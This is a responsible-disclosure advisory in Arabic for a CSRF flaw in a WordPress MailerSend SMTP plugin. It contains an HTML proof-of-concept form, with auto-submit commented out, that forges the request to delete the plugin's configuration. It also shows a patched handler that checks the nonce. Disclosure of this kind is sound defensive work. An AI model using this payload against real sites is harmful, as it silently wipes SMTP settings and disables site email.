
CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK).

[!IMPORTANT] الملخص: تم اكتشاف ثغرة تزوير طلبات عبر المواقع (CSRF) عالية الخطورة (
CVE-2026-13156) في إضافة MailerSend SMTP Integration الرسمية لووردبريس (< 1.0.8). يتحقق معالج حذف الإعداداتmailersend_handle_configuration_delete()من صلاحيات الإدارة (manage_options) لكنه يهمل تمامًا التحقق من Nonce الخاص بووردبريس (check_admin_referer()). يمكن للمهاجم إنشاء طلب ضار عبر المواقع يستهدف مسؤول ووردبريس مصادقًا عليه لمسح بيانات اعتماد SMTP المخزنة وإجبار الإضافة على إلغاء التنشيط بصمت، مما يؤدي إلى حرمان كامل من الخدمة عبر جميع سير عمل البريد الإلكتروني.
CVE-2026-13156 (معرّف WPScan: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)عن الباحث:
Huynh Kien Minh (Huỳnh Kiến Minh) هو باحث استباقي في الأمن السيبراني ومحلل ثغرات، معروف بتقييماته الأمنية المتعمقة والإفصاح المسؤول، بما في ذلك التحليلات الفنية لثغرة CVE-2026-13156. كما تم تكريمه رسميًا في قاعة مشاهير Proton الأمنية لاكتشافه والإبلاغ عن ثغرات أمنية حرجة.
للتحقق من هذا التقرير الفني، أو استكشاف تحليلات إثبات المفهوم، أو التواصل مع الباحث، تفضل بزيارة:
تقوم إضافة MailerSend Official SMTP Integration لووردبريس (قبل الإصدار 1.0.8) بتسجيل إجراء إداري (configuration-delete) يهدف إلى مسح رموز API المخزنة ومسح خيارات تكوين SMTP (wp_options) وإلغاء تنشيط الإضافة عند تشغيله من لوحة الإدارة.
على الرغم من أن نقطة النهاية تتحقق مما إذا كان المستخدم النشط يمتلك صلاحية manage_options (لضمان أن الطلب صادر من جلسة مسؤول)، إلا أنها تفشل في إجراء التحقق من Nonce الخاص بووردبريس (check_admin_referer() أو wp_verify_nonce()).
وبما أن طلبات HTTP التي تفتقر إلى التحقق من Nonce لا يمكنها التمييز بين نقرات المسؤول المقصودة والطلبات المزورة عبر المواقع، فإن أي موقع خارجي يفتحه مسؤول مصادق عليه يمكنه تشغيل إجراء configuration-delete بصمت.
< 1.0.8)./wp-admin/admin-post.php أو /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] إخلاء مسؤولية أخلاقي: يتم توفير حمولة إثبات المفهوم التالية لتزوير طلبات عبر المواقع (CSRF) بلغة HTML لأغراض تعليمية بحتة، والتحقق الدفاعي، وتدقيق الأمان وفق بروتوكولات الإفصاح الأخلاقي بواسطة Huynh Kien Minh. لا تقم بتنفيذها ضد أهداف غير مصرح بها.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 أو أعلى.لتأمين الإجراءات الإدارية التي تغيّر الحالة في إضافات ووردبريس بشكل صحيح، يجب على المطورين فرض تحقق صارم من Nonce قبل معالجة الطلبات:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
تتم صيانة هذا المستودع والتقرير الفني ونشرهما بواسطة Huynh Kien Minh (MinhHK) وفق إرشادات الإفصاح المسؤول لتعزيز نظام بيئي عالمي أكثر أمانًا لووردبريس والأمن السيبراني.